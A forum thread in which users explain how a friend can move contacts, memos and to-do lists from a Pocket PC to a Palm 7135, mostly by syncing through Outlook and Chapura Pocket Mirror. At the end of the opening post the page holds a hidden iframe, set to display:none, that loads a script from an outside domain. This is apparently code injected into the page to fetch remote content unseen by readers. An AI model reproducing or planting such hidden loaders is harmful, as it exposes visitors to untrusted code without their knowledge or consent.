+ Reply to Thread

Converting to a 7135 from a Pocket PC device

I have a fried who just purchased a 7135. He is converting from an older model Pocket PC device. He is wondering if there is any convenient way to convert his contacts, memos and todo lists. I did a search for threads on this topic, but came up empty-handed.

Anyone have any helpful suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dave

I am not familiar with PPC devices at all but I would assume that the address book, memos, and todo lists in PPC all sync with Outlook on his desktop. Assuming this is true, he shoud sync his PPC device to Outlook if he hasn't already (this will make sure the current info he has on his PPC device will be the same as what is in Outlook). Then, install the outlook conduit software that came with the 7135 onto the desktop, sync the 7135, and everything should transfer over just fine. That's how I would do it.

Re: Converting to a 7135 from a Pocket PC device

Originally posted by dwdod
    I have a fried who just purchased a 7135. He is converting from an older model Pocket PC device. He is wondering if there is any convenient way to convert his contacts, memos and todo lists. I did a search for threads on this topic, but came up empty-handed.

Anyone have any helpful suggestions?
    I have never owned a PPC device. But if he is using Outlook as his desktop PIM, then in my mind it’s not really an issue of switching from PPC to Palm. It’s just a matter of wiping out ActiveSync conduits and installing the Chapura Pocket Mirror Outlook conduits, and syncing the 7135 with Outlook (I always back up my PST file and have Outlook overwrite handheld to be safe). Is he using something other than Outlook on the desktop?
    Please visit my picture site: Robert-O-Rama :)

poked back in
    Hmm... can PPC users use Palm Desktop as a PIM?
    And I do know of programs on Palmgear to send contacts to PPC devices, but not the other way around.

Originally posted by M3wThr33
    Hmm... can PPC users use Palm Desktop as a PIM?
    I'm going to guess no :p

tcv
    I just went from an iPaq to the 7135.

Originally, I had thought I would simply export my Outlook data to a file and import that into Palm Desktop.

But I had decided, after all, to purchase the full version of Chapura Pocket Mirror and continue to use Outlook.

There are a few reasons why I chose this route.

1. Ease of transfer. (There are a number of file types you can export to from Outlook, but they would inherently involve tweaking my contacts and stuff one I got it all into Palm Desktop.)

2. Pocket Mirror works _very_ will with Outlook and the Palm.

3. I had gotten use to using Outlook's contact and appointment handling options and didn't really care to change my environment.

So, to answer your question, I purchased Pocket Mirror and installed it before my first sync. I then configured the options including forcing Pocket Mirror to fully overwrite hand-held the first time. Once I performed the sync, everything was over there the first time and I was iPaq-free.

For what it's worth, I didn't have a lot of PPC-only stuff on my iPaq, so my primary concern was my appointments and contacts.

m

Administrator
    my old tried and true approach is to do manual installs of everything.. especially when going form two totally different platforms.... of course you didn't want to hear that Dr. DW, but thats the best way...

Originally posted by marctronixx
    my old tried and true approach is to do manual installs of everything.. especially when going form two totally different platforms.... .
    Except in this case their will be zero compatible handheld apps to reinstall from one platform to the other. The only thing being carried over is the PIM data, and that will come from the desktop app. It would be hard to mess up this transition even if you tried.

Largely Converged Member av8instyle's Avatar
    I had decided, after all, to purchase the full version of Chapura Pocket Mirror and continue to use Outlook
    Why would you need to do this? It is my understanding that you can sync seamlessly using Hotsync and Outlook. Is this not true?

I just went from an iPaq to the 7135.
    What were your reasons? Do you regret? I just did this too and haven't received my 7135 yet. I am hoping I don't have regrets. The PPC has a lot of great features, but I really needed a combo unit and this one seemed to be the best one available.

tcv
    I didn't need to purchase the pro version of Mirror. I did it because my Outlook was set up in such a way that the lighter version, which comes with the 7135, wouldn't sync it all quite right. For instance, personal folders and/or contacts broken into separate folders will not integrate seamlessly with the Palm's categories. The Pro version created a category already well defined in Outlook on the Palm and then transferred the contacts therein.

As for regrets, I have none, but remember a PDA decision is an intensely personal choice. The main reason to get this was the integration. Sure, there are PPC-phones, but the one Verizon offered is known to be the less tuned of those currently available and I can't switch providers because the phone number isn't portable (yet).

But even if I could have moved to T-Mobile, I wouldn't have gotten the PPC-Phone. After having used a PPC device for two years, I had grown weary of the operating system and the "way of doing things" within it.